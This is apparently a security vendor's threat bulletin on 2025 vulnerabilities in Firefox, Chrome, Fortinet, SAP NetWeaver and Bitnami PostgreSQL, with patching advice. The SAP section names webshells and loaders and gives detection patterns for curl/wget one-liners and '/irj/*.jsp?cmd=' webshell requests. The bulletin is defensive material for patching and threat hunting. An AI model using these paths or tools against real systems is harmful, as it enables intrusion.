At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.  

Firefox Encounters Critical Zero-Day Vulnerabilities in JavaScript Engine 

Mozilla Firefox was affected by two critical zero-day vulnerabilities — CVE-2025-4918 and CVE-2025-4919 — discovered in its JavaScript engine. Attackers could exploit these flaws through maliciously crafted websites, potentially leading to arbitrary code execution. The vulnerabilities were demonstrated at Pwn2Own 2025 and have been assigned a CVSS v3.1 score of 8.8 (High). Affected versions include Firefox versions earlier than 138.0.4, ESR earlier than 128.10.1, and earlier than 115.23.1.    

RECOMMENDATIONS     

• Update Firefox to version 138.0.4 or higher. 

• Update Firefox ESR to 128.10.1 or 115.23.1, depending on deployment. 

• Monitor web traffic for signs of exploit attempts. 

• Educate users on phishing and browser security. 

Microsoft Addresses High-Severity Vulnerability in Defender for Linux 

Microsoft released one security fix classified as High in severity. 

The update mentions CVE-2025-47161 – a High-severity elevation of privilege vulnerability in Microsoft Defender for Endpoint Elevation of Privilege Vulnerability for Linux. 

RECOMMENDATIONS     

• Ensure all systems are patched and updated.    

Google Chrome Patches Critical Zero-Day Vulnerabilities 

CVE-2025-4664 is a high-severity vulnerability in Google Chrome, caused by insufficient policy enforcement in the Loader component. It allows attackers to bypass Chrome’s sandbox, enabling unauthorized code execution or cross-origin data leakage via specially crafted HTML content. This vulnerability has been exploited in the wild as a zero-day. 

It has been patched in Chrome version 136.0.7103.113/.114 (Windows/Mac) and 136.0.7103.113 (Linux). Android users received the fix in version 136.0.7103.125. 

Google acknowledged the exploit activity but withheld specific technical details to prevent further abuse. A separate high-severity vulnerability, CVE-2025-4609, affecting Mojo (Chrome’s IPC layer), was also patched, though it has not been reported as exploited. 

RECOMMENDATIONS     

• Ensure all systems are patched and updated.    

• Avoid clicking unknown or suspicious links that may serve crafted HTML content. 

Fortinet Fixes Critical CVE-2025-32756 Zero-Day RCE Flaw in FortiVoice and Related Products 

Fortinet patched a critical security flaw that has been exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems. 

The vulnerability, tracked as CVE-2025-32756, carries a CVSS score of 9.6 out of 10.0. 

This stack-based buffer overflow vulnerability (CWE-121) affects FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. It may allow a remote, unauthenticated attacker to execute arbitrary code or commands via crafted HTTP requests. 

RECOMMENDATIONS     

• Users of FortiVoice, FortiMail, FortiNDR, FortiRecorder and FortiCamera are recommended to apply the necessary fixes to secure their devices from active exploitation attempts. If immediate patching is not an option, it’s advised to disable the HTTP/HTTPS administrative interface as a temporary workaround. 

• Monitor and block IoCs 

State-Linked Threat Actors Exploit SAP NetWeaver to Target Critical Infrastructures 

APT groups have launched widespread exploitation campaigns against SAP NetWeaver Visual Composer systems, leveraging CVE-2025-31324, an unauthenticated RCE file upload vulnerability. These campaigns targeted critical infrastructure entities across North America, Europe, and the Middle East. Threat actors deployed multiple malware strains, webshells, and loader frameworks to maintain persistence and facilitate espionage, system discovery, and lateral movement. 

Observed Malware and Tools: 

• coreasp.js – Encrypted webshell resembling Behinder v3 (AES encrypted, in-memory persistence). 

• forwardsap.jsp – Simple unauthenticated fallback webshell for command execution. 

• KrustyLoader – Rust-based loader used to deliver Sliver C2 payloads. 

• SNOWLIGHT – Loader for in-memory deployment of second-stage implants. 

• VShell – Remote Access Trojan executed under kernel thread masquerade. 

• GOREVERSE – SSH-based RAT. 

• Nuclei – Reconnaissance tool used to scan for vulnerable SAP NetWeaver hosts. 

RECOMMENDATIONS     

• Apply the SAP patch for CVE-2025-31324. 

• Restrict access to sensitive endpoints using a Web Application Firewall (WAF) or firewall. 

• Monitor for unauthorized .jsp uploads under SAP Visual Composer directories. 

• Use Endpoint Detection and Response (EDR) tools to flag Base64 decoding executed via Bash or one-liner curl/wget commands. 

• Monitor and block the list of shared IoCs. 

• Block unauthenticated access to Visual Composer endpoints. 

• Hunt for hits to /irj/*.jsp?cmd= to detect active webshell exploitation. 

Fortinet Releases Update Addressing Multiple High-Severity Vulnerabilities  

Fortinet released a security update to address multiple vulnerabilities in several products, including FortiClient for Mac, FortiClient for Windows, FortiAnalyzer, FortiManager, FortiPortal, and FortiOS. 

The update addresses seven CVEs, categorized as 2 High, 2 Medium, and 3 Low in severity. 

[High] CVE-2025-25251: An incorrect authorization vulnerability in FortiClient for Mac may allow a local attacker to escalate privileges via crafted XPC messages. 

[High] CVE-2023-42788: An improper neutralization of special elements used in an OS command (‘OS Command Injection’) vulnerability in FortiManager, FortiAnalyzer, and FortiAnalyzer-BigData may allow a local attacker with low privileges to execute unauthorized code via specially crafted arguments to a CLI command. 

RECOMMENDATIONS     

• Ensure all systems are patched and updated.    

VMware Releases Security Update for Bitnami PostgreSQL Access Flaw 

VMware has released one critical security fix addressing CVE-2025-22248 related to Bitnami : CVE-2025-22248: Bitnami 
 
The Bitnami/pgpool Docker image and the Bitnami/postgres-ha Kubernetes Helm chart, when deployed with default configurations, include a repmgr user that may allow unauthenticated access to the PostgreSQL database within the cluster. The PGPOOL_SR_CHECK_USER environment variable, typically set to repmgr, is used by Pgpool for performing streaming replication checks. If the associated authentication method is misconfigured (e.g., set to trust), this user can log in without a password. This creates a significant security risk—particularly if Pgpool is exposed externally—as it may allow an attacker to gain unauthorized access to the PostgreSQL service. The issue affects both the Docker image and the Helm chart, and it is recommended to audit authentication settings, restrict external access, and ensure proper access controls are in place. 

RECOMMENDATIONS     

• Ensure all systems are patched and updated.    

References 

https://cybersecuritynews.com/firefox-0-day-vulnerabilities/ 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161 

https://cybersecuritynews.com/google-chrome-0-day-vulnerability/, https://chromereleases.googleblog[.]com/2025/05/stable-channel-update-for-desktop_14.html 

https://fortiguard.fortinet.com/psirt/FG-IR-25-254 

https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures 

https://fortiguard.fortinet.com/psirt?filter=1&version=&date=2025 

https://github.com/bitnami/charts/security/advisories/GHSA-mx38-x658-5fwj